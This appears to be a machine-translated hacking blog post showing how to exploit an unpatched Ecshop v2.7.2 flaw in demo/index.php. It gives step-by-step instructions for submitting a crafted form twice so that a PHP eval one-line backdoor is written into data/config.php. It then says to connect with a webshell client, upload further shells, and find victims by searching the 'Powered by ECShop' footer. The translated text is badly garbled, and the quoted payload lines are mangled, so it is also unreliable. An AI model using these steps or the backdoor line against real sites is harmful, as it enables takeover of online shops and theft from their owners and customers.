Seconds kill Ecshop's front desk write shell 0day

Ecshop known as the largest open-source online shop system, the official introduction of it: "Ecshop online shop system is a set of free open-source web store software, no matter in stability, code optimization, operating efficiency, load capacity, security level, functional controllability and the authority of the rigor of similar products at home and abroad leading position.

According to my understanding, as an online shop system, the security of the system should be placed in a very important position, but Ecshop seems to be a loophole. Just a few days ago, xhming Daniel also announced a ecshop front desk writing shell Oday, the use of loopholes to get the shell is very simple, can be said to be a second kill. This vulnerability is also present in the latest version of the official download of Ecshop, which has not yet been patched or updated to patch the software.

Ecshop a new loophole for me is a good thing, because there is a hole to take the shell, haha. Also hope that ecshop in the vulnerability of the excavation of the spur can be ecshop do more safe, more excellent, after all, online shop system involves online transactions, not for fun.

I. Introduction of the vulnerability

The vulnerability file is the index.php in the demo directory, I will not post the code!

For a detailed description of the vulnerability, see the source of the vulnerability.

Ii. methods of exploiting exploits

Specific vulnerability analysis I would not, directly to see how to exploit this loophole to get the shell. The latest version of Ecshop is, I am dangerous stroll from the official download of the GBK version of ECSHOP_V2.7.2PGBK Release0604, in the PHPP environment of the virtual machine to install Ecshop.

In an article in the Forum xhming gives a exploit exp, is a file for the submission of data HTML files, two times after the submission will automatically open demo/index.php, the page will show Phpinfo,xhming said, mention

The content can be made freely, and the implication is that you can construct your own submission directly to the shell rather than to the symbolic execution of the phpinfo () function. But not everyone will construct direct access to the shell's submissions, fortunately MR.LP in the Xhming exp based on the modified after giving a direct access to the Shell's exp.

How to use:

1. Modify the contents of the action in the form to require a URL.

2. Submit the form once.

3. Connect a word trojan, password for cmd. Save the above code as exp.html, directly hit the development of existing garbled characters. The "Charset=utf-8" modified to "CHARSET=GBK" after the garbled problem solved.

Open the exp.html with Notepad, change the submission address to my virtual machine ecshop the submission address, save the changes to open exp.html, click the "Submit" button to display the results, Will put php-sentence Trojan to write to the data directory under the config.php file, with lanker-sentence PHP back-door client connection, password cmd, found php-sentence Trojan can not be used.

On the page press the Web browser's Back button to exp.html, click the "Submit" button to submit the data again. After the data has been submitted again with the lanker-sentence PHP back-end client connection, this time to get the shell).

The original must be submitted two times to get the shell, here to pay attention.

By comparing the config.php in the original data directory and getting the config after the shell. PHP, found through two commit data to CONFIG. The following data is written in PHP: Define (' Ec_languagei ',.); @eVal ($ one post[cmd]); # '); @eval ($_POST[CMDL); # ');. It is recommended to use the obtained shell to upload another shell. Then remove the newly written data from the config.php.

You may find a Web site that has this vulnerability by searching for "Powered by ECShop v2,7.2". Ecshop of the front desk to write shell 0day dangerous stroll to introduce to you here, own Ecshop website friends and so on official out of this loophole patch quickly hit it, the loophole is very serious. This exploit is very simple, just write the address point of the target site two times "submit" button to get the shell, the existence of the vulnerability of the site can be said to be a second kill. Hope that the use of this vulnerability to the shell, do not cause damage to the site, if you can know the cause of the vulnerability and learn the exploits of the methods and ideas are better.

Seconds kill Ecshop's front desk write shell 0day